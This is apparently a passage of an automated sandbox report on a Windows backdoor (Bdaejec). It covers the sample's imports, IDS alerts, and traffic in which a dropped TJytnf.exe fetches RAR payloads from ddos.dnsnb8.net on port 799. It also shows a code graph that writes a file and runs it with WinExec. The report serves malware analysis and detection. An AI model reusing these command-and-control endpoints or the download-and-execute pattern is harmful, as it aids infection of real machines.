                          RT_STRING0x33d3680x82StarOffice Gallery theme p, 536899072 objects, 1st nEnglishUnited States0.7153846153846154
                          RT_STRING0x33d3ec0x2adataEnglishUnited States0.5476190476190477
                          RT_STRING0x33d4180x184dataEnglishUnited States0.48711340206185566
                          RT_STRING0x33d59c0x4e6dataEnglishUnited States0.37719298245614036
                          RT_STRING0x33da840x264dataEnglishUnited States0.3333333333333333
                          RT_STRING0x33dce80x2dadataEnglishUnited States0.3698630136986301
                          RT_STRING0x33dfc40x8adataEnglishUnited States0.6594202898550725
                          RT_STRING0x33e0500xacdataEnglishUnited States0.45348837209302323
                          RT_STRING0x33e0fc0xdedataEnglishUnited States0.536036036036036
                          RT_STRING0x33e1dc0x4a8dataEnglishUnited States0.3221476510067114
                          RT_STRING0x33e6840x228dataEnglishUnited States0.4003623188405797
                          RT_STRING0x33e8ac0x2cdataEnglishUnited States0.5227272727272727
                          RT_STRING0x33e8d80x53cdataEnglishUnited States0.2947761194029851
                          RT_GROUP_CURSOR0x33ee140x22Lotus unknown worksheet or configuration, revision 0x2EnglishUnited States1.0
                          RT_GROUP_CURSOR0x33ee380x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                          RT_GROUP_CURSOR0x33ee4c0x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                          RT_GROUP_CURSOR0x33ee600x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                          RT_GROUP_CURSOR0x33ee740x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                          RT_GROUP_CURSOR0x33ee880x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                          RT_GROUP_CURSOR0x33ee9c0x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                          RT_GROUP_CURSOR0x33eeb00x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                          RT_GROUP_CURSOR0x33eec40x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                          RT_GROUP_CURSOR0x33eed80x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                          RT_GROUP_CURSOR0x33eeec0x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                          RT_GROUP_CURSOR0x33ef000x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                          RT_GROUP_CURSOR0x33ef140x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                          RT_GROUP_CURSOR0x33ef280x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                          RT_GROUP_CURSOR0x33ef3c0x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                          RT_GROUP_ICON0x33ef500x14dataEnglishUnited States1.2
                          RT_VERSION0x33ef640x62cdataEnglishUnited States0.4917721518987342
                          RT_MANIFEST0x33f5900x280XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.553125
                          DLLImport
                          KERNEL32.dlllstrcmpA, GetPrivateProfileIntA, GetPrivateProfileStringA, WritePrivateProfileStringA, InitializeCriticalSection, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GlobalReAlloc, GlobalHandle, SetThreadPriority, GetAtomNameA, FileTimeToSystemTime, GetThreadLocale, GlobalFlags, CompareStringW, GetLocaleInfoW, GetSystemDefaultUILanguage, GetUserDefaultUILanguage, GetOEMCP, GetCPInfo, GetACP, GetCurrentDirectoryA, DeleteFileA, FlushFileBuffers, GetFullPathNameA, LockFile, SetEndOfFile, SetFilePointer, UnlockFile, DuplicateHandle, GetCurrentProcess, LoadLibraryExA, GetShortPathNameA, lstrcmpiA, MoveFileA, GetVolumeInformationA, GetStringTypeExA, GetWindowsDirectoryA, FileTimeToLocalFileTime, GetFileAttributesA, GetFileAttributesExA, GetFileSizeEx, GetFileTime, LocalFileTimeToFileTime, SetFileAttributesA, SetFileTime, GetTickCount, lstrcpyA, VerSetConditionMask, VerifyVersionInfoA, GetTempPathA, GetTempFileNameA, GetProfileIntA, VirtualProtect, GetDiskFreeSpaceA, ReplaceFileA, GetUserDefaultLCID, FindResourceExW, LocalLock, LocalUnlock, GetSystemTimeAsFileTime, RtlUnwind, GetCommandLineA, GetSystemInfo, VirtualAlloc, VirtualQuery, CreateThread, ExitThread, ExitProcess, GetModuleHandleExW, AreFileApisANSI, IsDebuggerPresent, IsProcessorFeaturePresent, HeapQueryInformation, SetStdHandle, GetFileType, IsValidCodePage, GetTimeZoneInformation, GetStdHandle, GetStartupInfoW, GetVersionExA, GetEnvironmentStringsW, FreeEnvironmentStringsW, UnhandledExceptionFilter, SetUnhandledExceptionFilter, CreateEventW, TerminateProcess, CreateSemaphoreW, FatalAppExitA, SetConsoleCtrlHandler, GetStringTypeW, GetConsoleCP, GetConsoleMode, ReadConsoleW, SetFilePointerEx, GetDateFormatW, GetTimeFormatW, LCMapStringW, IsValidLocale, EnumSystemLocalesW, OutputDebugStringW, WriteConsoleW, CreateFileW, SetEnvironmentVariableA, CreateEventA, SetEvent, CompareStringA, GlobalGetAtomNameA, GlobalFindAtomA, GlobalAddAtomA, FindResourceA, LoadLibraryW, lstrcmpW, GlobalDeleteAtom, LoadLibraryExW, GetModuleHandleW, GetModuleFileNameW, FreeResource, GetSystemDirectoryW, GetCurrentThreadId, InitializeCriticalSectionAndSpinCount, LeaveCriticalSection, EnterCriticalSection, EncodePointer, OutputDebugStringA, MultiByteToWideChar, CopyFileA, FormatMessageA, MulDiv, GlobalFree, GlobalUnlock, GlobalLock, GlobalSize, GlobalAlloc, SetLastError, ReleaseSemaphore, OpenSemaphoreA, CreateSemaphoreA, WaitForSingleObject, Sleep, SearchPathA, GetFileSize, DeviceIoControl, LocalFree, LocalAlloc, WriteFile, GetVersion, GetLocalTime, ReadFile, CloseHandle, FindNextFileA, CreateFileA, SystemTimeToFileTime, GetSystemTime, FindClose, FindFirstFileA, GetProcAddress, SetErrorMode, FreeLibrary, GetModuleHandleA, GetModuleFileNameA, GetEnvironmentVariableA, GetCurrentProcessId, GetCurrentThread, ResumeThread, QueryPerformanceCounter, SuspendThread, LoadLibraryA, WideCharToMultiByte, FindResourceW, SizeofResource, LockResource, LoadResource, DeleteCriticalSection, InitializeCriticalSectionEx, GetProcessHeap, HeapSize, HeapFree, HeapReAlloc, HeapAlloc, HeapDestroy, GetLastError, RaiseException, LocalReAlloc, DecodePointer
                          USER32.dllIsRectEmpty, GetNextDlgGroupItem, MessageBeep, CreatePopupMenu, GetMenuDefaultItem, BringWindowToTop, LoadAcceleratorsA, TranslateAcceleratorA, LoadMenuA, InsertMenuItemA, SetRectEmpty, LoadImageA, GetMenuBarInfo, UnpackDDElParam, ReuseDDElParam, RegisterClipboardFormatA, DrawFocusRect, DrawIconEx, GetIconInfo, GetAsyncKeyState, EnableScrollBar, HideCaret, InvertRect, NotifyWinEvent, MapVirtualKeyA, GetKeyNameTextA, UnionRect, GetSystemMenu, SetParent, PostThreadMessageA, SetLayeredWindowAttributes, EnumDisplayMonitors, OpenClipboard, CloseClipboard, SetClipboardData, EmptyClipboard, DrawStateA, LoadImageW, DrawEdge, DrawFrameControl, SetWindowRgn, IsMenu, UpdateLayeredWindow, MonitorFromPoint, TrackMouseEvent, LoadMenuW, GetComboBoxInfo, IsZoomed, GetKeyboardLayout, IsCharLowerA, MapVirtualKeyExA, GetDCEx, LockWindowUpdate, GetKeyboardState, ToAsciiEx, LoadAcceleratorsW, CreateAcceleratorTableA, DestroyAcceleratorTable, SetCursorPos, SetClassLongA, GetDoubleClickTime, CopyIcon, SetMenuDefaultItem, ModifyMenuA, CharUpperBuffA, FrameRect, EnumChildWindows, DrawMenuBar, DefFrameProcA, DefMDIChildProcA, TranslateMDISysAccel, IsClipboardFormatAvailable, GetUpdateRect, SubtractRect, SendNotifyMessageA, InSendMessage, CreateMenu, DestroyCursor, GetWindowRgn, DrawIcon, WindowFromDC, GetTabbedTextExtentA, GetTabbedTextExtentW, RealChildWindowFromPoint, IntersectRect, InflateRect, LoadCursorA, GetSystemMetrics, MapDialogRect, SetWindowContextHelpId, GetWindowThreadProcessId, SetCursor, ShowOwnedPopups, PostQuitMessage, GetCursorPos, GetMessageA, GetDesktopWindow, GetActiveWindow, GetNextDlgTabItem, EndDialog, CreateDialogIndirectParamA, IsDialogMessageA, SetWindowTextA, ScrollWindowEx, IsWindowEnabled, SendDlgItemMessageA, IsDlgButtonChecked, CheckRadioButton, CheckDlgButton, GetDlgItemTextA, SetRect, GetDlgItemInt, SetDlgItemInt, MoveWindow, ShowWindow, GetMonitorInfoA, MonitorFromWindow, WinHelpA, GetScrollInfo, SetScrollInfo, LoadIconW, LoadIconA, CallNextHookEx, UnhookWindowsHookEx, SetWindowsHookExA, GetWindow, GetLastActivePopup, GetTopWindow, GetClassNameA, GetClassLongA, SetWindowLongA, GetWindowLongA, PtInRect, EqualRect, CopyRect, MapWindowPoints, MessageBoxA, AdjustWindowRectEx, GetWindowRect, GetClientRect, GetWindowTextLengthA, GetWindowTextA, RemovePropA, GetPropA, SetPropA, ShowScrollBar, GetScrollRange, SetScrollRange, GetScrollPos, SetScrollPos, ScrollWindow, RedrawWindow, ValidateRect, SetForegroundWindow, GetForegroundWindow, SetActiveWindow, UpdateWindow, TrackPopupMenuEx, TrackPopupMenu, SetMenu, GetMenu, GetCapture, GetKeyState, SetFocus, GetDlgCtrlID, GetDlgItem, IsWindowVisible, EndDeferWindowPos, DeferWindowPos, BeginDeferWindowPos, SetWindowPlacement, GetWindowPlacement, SetWindowPos, DestroyWindow, IsChild, IsWindow, CreateWindowExA, GetClassInfoExA, GetClassInfoA, RegisterClassA, CallWindowProcA, DefWindowProcA, PostMessageA, GetMessageTime, GetMessagePos, RegisterWindowMessageA, LoadBitmapW, GetParent, SetMenuItemInfoA, GetMenuCheckMarkDimensions, SetMenuItemBitmaps, EnableMenuItem, CheckMenuItem, FillRect, GetSysColor, ScreenToClient, ClientToScreen, EndPaint, BeginPaint, ReleaseDC, GetWindowDC, GetDC, TabbedTextOutA, GrayStringA, DrawTextExA, DrawTextA, RemoveMenu, AppendMenuA, InsertMenuA, GetMenuItemCount, GetMenuItemID, GetSubMenu, GetMenuState, GetMenuStringA, UnregisterClassA, EnableWindow, TranslateMessage, DispatchMessageA, PeekMessageA, SendMessageA, GetFocus, InvalidateRgn, CopyAcceleratorTableA, OffsetRect, CharNextA, LoadCursorW, WindowFromPoint, SetCapture, ReleaseCapture, WaitMessage, CharUpperA, DestroyIcon, IsIconic, InvalidateRect, KillTimer, SetTimer, DeleteMenu, GetDialogBaseUnits, CopyImage, SystemParametersInfoA, GetMenuItemInfoA, SetDlgItemTextA, DestroyMenu, GetSysColorBrush
                          GDI32.dllCreateDCA, BitBlt, CreateBitmap, CreateCompatibleDC, CreateDIBPatternBrushPt, CreateHatchBrush, SetWindowExtEx, CreatePatternBrush, GetDeviceCaps, GetTextMetricsA, StartDocA, StartPage, EndPage, CreatePen, SetViewportOrgEx, SetViewportExtEx, PolylineTo, PolyBezierTo, ExtTextOutA, TextOutA, CreateRectRgn, CreateSolidBrush, DeleteDC, DeleteObject, Escape, ExcludeClipRect, MoveToEx, GetClipRgn, GetCurrentPositionEx, GetObjectType, GetPixel, GetStockObject, GetViewportExtEx, GetWindowExtEx, IntersectClipRect, LineTo, OffsetClipRgn, PlayMetaFile, PtVisible, RectVisible, RestoreDC, SaveDC, SelectClipRgn, ExtSelectClipRgn, SelectObject, SelectPalette, SetBkColor, SetBkMode, SetMapperFlags, SetGraphicsMode, SetMapMode, SetLayout, GetLayout, SetPolyFillMode, SetROP2, SetStretchBltMode, SetTextCharacterExtra, SetTextColor, SetTextAlign, SetTextJustification, PlayMetaFileRecord, GetObjectA, ExtCreatePen, SetArcDirection, SelectClipPath, PolyDraw, ArcTo, SetColorAdjustment, ModifyWorldTransform, SetWorldTransform, GetClipBox, CopyMetaFileA, DeleteMetaFile, CreateMetaFileA, CloseMetaFile, GetTextFaceA, SetWindowOrgEx, OffsetViewportOrgEx, OffsetWindowOrgEx, ScaleViewportExtEx, GetTextExtentPoint32W, GetTextExtentPointA, ScaleWindowExtEx, CombineRgn, CreateFontIndirectA, CreateRectRgnIndirect, GetMapMode, PatBlt, SetRectRgn, DPtoLP, GetTextExtentPoint32A, GetBkColor, GetTextColor, GetRgnBox, CreateCompatibleBitmap, CreatePalette, GetNearestPaletteIndex, GetPaletteEntries, GetSystemPaletteEntries, RealizePalette, CreateFontA, GetCharWidthA, StretchDIBits, CreateDIBitmap, EnumFontFamiliesA, GetTextCharsetInfo, GetDIBits, SetPixel, StretchBlt, CreateDIBSection, SetDIBColorTable, CreateEllipticRgn, Ellipse, CreatePolygonRgn, Polygon, Polyline, Rectangle, EnumFontFamiliesExA, OffsetRgn, CreateRoundRectRgn, GetCurrentObject, RoundRect, FrameRgn, PtInRegion, SetPixelV, ExtFloodFill, SetPaletteEntries, FillRgn, GetBoundsRect, GetWindowOrgEx, LPtoDP, GetViewportOrgEx, EndDoc, AbortDoc, SetAbortProc, GetROP2, GetBkMode, GetNearestColor, GetPolyFillMode, GetStretchBltMode, GetTextAlign, EnumMetaFile
                          COMDLG32.dllGetOpenFileNameA
                          ADVAPI32.dllRegSetValueA, RegDeleteKeyA, RegDeleteValueA, RegEnumKeyA, RegQueryValueA, RegEnumValueA, RegOpenKeyExW, RegEnumKeyExA, SetFileSecurityA, GetFileSecurityA, RegCreateKeyExA, RegSetValueExA, RegQueryValueExA, RegOpenKeyExA, RegCloseKey
                          MSIMG32.dllTransparentBlt, AlphaBlend
                          SHLWAPI.dllPathStripToRootA, PathIsUNCA, PathRemoveFileSpecW, PathRemoveExtensionA, PathFindFileNameA, PathFindExtensionA, StrFormatKBSizeA
                          UxTheme.dllGetWindowTheme, GetThemeSysColor, IsAppThemed, GetThemePartSize, GetCurrentThemeName, GetThemeColor, CloseThemeData, OpenThemeData, DrawThemeParentBackground, IsThemeBackgroundPartiallyTransparent, DrawThemeBackground, DrawThemeText
                          oledlg.dll
                          OLEACC.dllLresultFromObject, CreateStdAccessibleObject, AccessibleObjectFromWindow
                          gdiplus.dllGdipDeleteGraphics, GdipCreateFromHDC, GdipSetInterpolationMode, GdipDrawImageRectI, GdipDrawImageI, GdipBitmapLockBits, GdipBitmapUnlockBits, GdipCreateBitmapFromScan0, GdipCreateBitmapFromFileICM, GdipCreateBitmapFromStreamICM, GdipCreateBitmapFromFile, GdipCreateBitmapFromStream, GdipCreateBitmapFromHBITMAP, GdiplusShutdown, GdipAlloc, GdipFree, GdiplusStartup, GdipCloneImage, GdipDisposeImage, GdipGetImageGraphicsContext, GdipGetImageWidth, GdipGetImageHeight, GdipGetImagePixelFormat, GdipGetImagePalette, GdipGetImagePaletteSize
                          IMM32.dllImmGetContext, ImmGetOpenStatus, ImmReleaseContext
                          WINMM.dllPlaySoundA
                          WINSPOOL.DRVDocumentPropertiesA, GetJobA, OpenPrinterA, ClosePrinter
                          SHELL32.dllDragFinish, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetPathFromIDListA, SHGetFileInfoA, ExtractIconA, SHAddToRecentDocs, ShellExecuteA, SHGetMalloc, SHBrowseForFolderA, SHAppBarMessage, ShellExecuteExA, DragQueryFileA
                          ole32.dllStgOpenStorage, StgIsStorageFile, CreateFileMoniker, OleCreateMenuDescriptor, OleDestroyMenuDescriptor, OleTranslateAccelerator, IsAccelerator, OleGetClipboard, CoLockObjectExternal, RegisterDragDrop, RevokeDragDrop, CreateGenericComposite, CreateItemMoniker, WriteClassStm, OleCreate, OleCreateFromData, StgCreateDocfile, OleCreateStaticFromData, OleCreateLinkToFile, OleCreateFromFile, OleLoad, OleSave, OleSaveToStream, OleSetContainedObject, OleGetIconOfClass, GetHGlobalFromILockBytes, PropVariantCopy, OleRegGetMiscStatus, OleRegEnumVerbs, OleQueryLinkFromData, OleQueryCreateFromData, OleIsRunning, CoGetMalloc, GetRunningObjectTable, CreateDataAdviseHolder, CreateOleAdviseHolder, OleLockRunning, OleSetMenuDescriptor, DoDragDrop, CreateStreamOnHGlobal, CoRegisterMessageFilter, OleIsCurrentClipboard, OleFlushClipboard, OleSetClipboard, CoRevokeClassObject, CoRegisterClassObject, OleUninitialize, StringFromCLSID, CoTaskMemAlloc, OleInitialize, CoFreeUnusedLibraries, OleRun, CreateILockBytesOnHGlobal, StgOpenStorageOnILockBytes, StgCreateDocfileOnILockBytes, CoGetClassObject, CoInitializeEx, CoDisconnectObject, StringFromGUID2, CLSIDFromProgID, CLSIDFromString, CoInitialize, CoCreateInstance, CoCreateGuid, CoUninitialize, SetConvertStg, OleRegGetUserType, ReleaseStgMedium, OleDuplicateData, ReadFmtUserTypeStg, WriteFmtUserTypeStg, WriteClassStg, ReadClassStg, CreateBindCtx, CoTreatAsClass, CoTaskMemFree, OleCreateLinkFromData
                          OLEAUT32.dllLoadTypeLib, SysStringLen, VariantChangeType, VariantClear, RegisterTypeLib, LoadRegTypeLib, VariantInit, SysReAllocStringLen, SystemTimeToVariantTime, VariantTimeToSystemTime, SafeArrayAllocDescriptor, SafeArrayAllocData, SysAllocStringLen, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayDestroy, SafeArrayRedim, SafeArrayGetDim, SafeArrayGetElemsize, SafeArrayGetUBound, SafeArrayGetLBound, SafeArrayLock, SafeArrayUnlock, SafeArrayAccessData, SafeArrayUnaccessData, SafeArrayGetElement, SafeArrayPutElement, SafeArrayCopy, SafeArrayPtrOfIndex, VariantCopy, SysAllocStringByteLen, SysStringByteLen, SafeArrayCreate, VarDateFromStr, VarCyFromStr, VarBstrFromCy, VarBstrFromDate, VarBstrFromDec, VarDecFromStr, OleCreateFontIndirect, SysAllocString, SysFreeString
                          Language of compilation systemCountry where language is spokenMap
                          EnglishUnited States
                          TimestampProtocolSIDSignatureSource PortDest PortSource IPDest IP
                          2024-07-24T22:22:34.069820+0200UDP2838522ETPRO MALWARE Backdoor.Win32/Bdaejec.A CnC Domain in DNS Lookup6227353192.168.2.41.1.1.1
                          2024-07-24T22:22:34.622058+0200TCP2807908ETPRO MALWARE Backdoor.Win32/Bdaejec.A Checkin49730799192.168.2.444.221.84.105
                          2024-07-24T22:22:39.755674+0200TCP2807908ETPRO MALWARE Backdoor.Win32/Bdaejec.A Checkin49731799192.168.2.444.221.84.105
                          TimestampSource PortDest PortSource IPDest IP
                          Jul 24, 2024 22:22:34.198359966 CEST49730799192.168.2.444.221.84.105
                          Jul 24, 2024 22:22:34.203314066 CEST7994973044.221.84.105192.168.2.4
                          Jul 24, 2024 22:22:34.203393936 CEST49730799192.168.2.444.221.84.105
                          Jul 24, 2024 22:22:34.205147982 CEST49730799192.168.2.444.221.84.105
                          Jul 24, 2024 22:22:34.211429119 CEST7994973044.221.84.105192.168.2.4
                          Jul 24, 2024 22:22:34.621977091 CEST7994973044.221.84.105192.168.2.4
                          Jul 24, 2024 22:22:34.622057915 CEST49730799192.168.2.444.221.84.105
                          Jul 24, 2024 22:22:34.622462034 CEST7994973044.221.84.105192.168.2.4
                          Jul 24, 2024 22:22:34.622654915 CEST49730799192.168.2.444.221.84.105
                          Jul 24, 2024 22:22:34.626636028 CEST49730799192.168.2.444.221.84.105
                          Jul 24, 2024 22:22:34.631470919 CEST7994973044.221.84.105192.168.2.4
                          Jul 24, 2024 22:22:39.354032993 CEST49731799192.168.2.444.221.84.105
                          Jul 24, 2024 22:22:39.359157085 CEST7994973144.221.84.105192.168.2.4
                          Jul 24, 2024 22:22:39.359257936 CEST49731799192.168.2.444.221.84.105
                          Jul 24, 2024 22:22:39.359735966 CEST49731799192.168.2.444.221.84.105
                          Jul 24, 2024 22:22:39.365240097 CEST7994973144.221.84.105192.168.2.4
                          Jul 24, 2024 22:22:39.755600929 CEST7994973144.221.84.105192.168.2.4
                          Jul 24, 2024 22:22:39.755673885 CEST49731799192.168.2.444.221.84.105
                          Jul 24, 2024 22:22:39.756247997 CEST7994973144.221.84.105192.168.2.4
                          Jul 24, 2024 22:22:39.756293058 CEST49731799192.168.2.444.221.84.105
                          Jul 24, 2024 22:22:52.623936892 CEST49731799192.168.2.444.221.84.105
                          TimestampSource PortDest PortSource IPDest IP
                          Jul 24, 2024 22:22:34.069819927 CEST6227353192.168.2.41.1.1.1
                          Jul 24, 2024 22:22:34.170281887 CEST53622731.1.1.1192.168.2.4
                          Jul 24, 2024 22:22:41.318310022 CEST53503171.1.1.1192.168.2.4
                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                          Jul 24, 2024 22:22:34.069819927 CEST192.168.2.41.1.1.10x8ca8Standard query (0)ddos.dnsnb8.netA (IP address)IN (0x0001)false
                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                          Jul 24, 2024 22:22:34.170281887 CEST1.1.1.1192.168.2.40x8ca8No error (0)ddos.dnsnb8.net44.221.84.105A (IP address)IN (0x0001)false
                          • ddos.dnsnb8.net:799
                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          0192.168.2.44973044.221.84.1057997356C:\Users\user\AppData\Local\Temp\TJytnf.exe
                          TimestampBytes transferredDirectionData
                          Jul 24, 2024 22:22:34.205147982 CEST288OUTGET /cj//k1.rar HTTP/1.1
                          Accept: */*
                          Accept-Encoding: gzip, deflate
                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                          Host: ddos.dnsnb8.net:799
                          Connection: Keep-Alive


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          1192.168.2.44973144.221.84.1057997356C:\Users\user\AppData\Local\Temp\TJytnf.exe
                          TimestampBytes transferredDirectionData
                          Jul 24, 2024 22:22:39.359735966 CEST288OUTGET /cj//k2.rar HTTP/1.1
                          Accept: */*
                          Accept-Encoding: gzip, deflate
                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                          Host: ddos.dnsnb8.net:799
                          Connection: Keep-Alive


                          Click to jump to process

                          Click to jump to process

                          Click to dive into process behavior distribution

                          Click to jump to process

                          Target ID:0
                          Start time:16:22:33
                          Start date:24/07/2024
                          Path:C:\Users\user\Desktop\biKy3nZEyJ.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Users\user\Desktop\biKy3nZEyJ.exe"
                          Imagebase:0x400000
                          File size:3'101'704 bytes
                          MD5 hash:6963BB0311DED02BA57657BA4A61D427
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:low
                          Has exited:true

                          Target ID:1
                          Start time:16:22:33
                          Start date:24/07/2024
                          Path:C:\Users\user\AppData\Local\Temp\TJytnf.exe
                          Wow64 process (32bit):true
                          Commandline:C:\Users\user\AppData\Local\Temp\TJytnf.exe
                          Imagebase:0xc00000
                          File size:15'872 bytes
                          MD5 hash:56B2C3810DBA2E939A8BB9FA36D3CF96
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Antivirus matches:
                          • Detection: 100%, Avira
                          • Detection: 100%, Joe Sandbox ML
                          Reputation:moderate
                          Has exited:true

                          Target ID:4
                          Start time:16:22:39
                          Start date:24/07/2024
                          Path:C:\Windows\SysWOW64\WerFault.exe
                          Wow64 process (32bit):true
                          Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7356 -s 1580
                          Imagebase:0xae0000
                          File size:483'680 bytes
                          MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true

                          Reset < >

                            Execution Graph

                            Execution Coverage:0.4%
                            Dynamic/Decrypted Code Coverage:0%
                            Signature Coverage:87.5%
                            Total number of Nodes:8
                            Total number of Limit Nodes:1
                            execution_graph 4601 740000 4603 740044 GetPEB 4601->4603 4605 740077 CreateFileA 4603->4605 4606 740265 4605->4606 4607 74022d 4605->4607 4608 740246 WriteFile 4607->4608 4609 740244 4607->4609 4610 740255 FindCloseChangeNotification WinExec 4608->4610 4609->4610 4610->4606

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 0 740044-740074 GetPEB 1 740077-74009a 0->1 2 74009d-7400a0 1->2 3 7400a6-7400bc 2->3 4 7401ee-74022b CreateFileA 2->4 5 740110-740116 3->5 6 7400be-7400c5 3->6 24 740265-740269 4->24 25 74022d-740230 4->25 8 740118-74011f 5->8 9 740129-74012f 5->9 6->5 10 7400c7-7400ce 6->10 8->9 11 740121-740124 8->11 12 740131-740138 9->12 13 740148-74014e 9->13 10->5 14 7400d0-7400d7 10->14 16 7401bb-7401c0 11->16 12->13 17 74013a-740141 12->17 18 740167-74016f 13->18 19 740150-740157 13->19 14->5 20 7400d9-7400dd 14->20 27 7401e0-7401e9 16->27 28 7401c2-7401c5 16->28 17->13 26 740143-740146 17->26 21 740171-740178 18->21 22 740188-74018e 18->22 19->18 29 740159-740160 19->29 20->5 23 7400df-7400e3 20->23 21->22 30 74017a-740181 21->30 32 7401a7-7401ad 22->32 33 740190-740197 22->33 23->16 31 7400e9-74010b 23->31 34 740232-740238 25->34 26->16 27->2 28->27 35 7401c7-7401ca 28->35 29->18 36 740162-740165 29->36 30->22 37 740183-740186 30->37 31->1 32->16 39 7401af-7401b6 32->39 33->32 38 740199-7401a0 33->38 40 740246-740252 WriteFile 34->40 41 74023a-740242 34->41 35->27 42 7401cc-7401cf 35->42 36->16 37->16 38->32 44 7401a2-7401a5 38->44 39->16 45 7401b8 39->45 47 740255-740262 FindCloseChangeNotification WinExec 40->47 41->34 46 740244 41->46 42->27 48 7401d1-7401d4 42->48 44->16 45->16 46->47 47->24 48->27 49 7401d6-7401d9 48->49 49->27 50 7401db-7401de 49->50 50->4 50->27
                            APIs
                            • CreateFileA.KERNELBASE(?,C0000000,00000000,00000000,00000002,00000080,00000000), ref: 00740223
                            • WriteFile.KERNELBASE(00000000,FFEC74CC,00003E00,?,00000000), ref: 00740252
                            • FindCloseChangeNotification.KERNELBASE(00000000), ref: 00740256
                            • WinExec.KERNEL32(?,00000005), ref: 00740262
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1870196017.0000000000740000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1869693906.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1869733669.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1869961548.000000000065C000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1870015988.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1870032387.00000000006DB000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1870032387.00000000006E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1870068280.00000000006E6000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1870084632.00000000006E9000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1870101916.00000000006EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1870101916.0000000000733000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1870101916.0000000000737000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1870101916.0000000000739000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1870171034.000000000073B000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1870213565.0000000000741000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_biKy3nZEyJ.jbxd
                            Similarity
                            • API ID: File$ChangeCloseCreateExecFindNotificationWrite
                            • String ID: .dll$Clos$Crea$GetM$GetT$Kern$TJytnf.exe$WinE$Writ$athA$catA$dleA$el32$lstr$odul
                            • API String ID: 2234911746-2051679233
                            • Opcode ID: e199eddd33a27495d627918e3a499fccf7fe6845e9a388fd4e39f2dae1141158
                            • Instruction ID: 586f86233e2cf17913a23bd254e9a1c0644a6c8c069bb837390bc4b2348fd581
                            • Opcode Fuzzy Hash: e199eddd33a27495d627918e3a499fccf7fe6845e9a388fd4e39f2dae1141158
                            • Instruction Fuzzy Hash: E7611775D0121ADBCF24CF94C884ABDFBB4BF48315F2586AAD605AB641C3789E81CBD1
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1869733669.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1869693906.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1869961548.000000000065C000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1870015988.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1870032387.00000000006DB000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1870032387.00000000006E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1870068280.00000000006E6000.00000004.00000001.01000000.00000003.sdmpDownload File
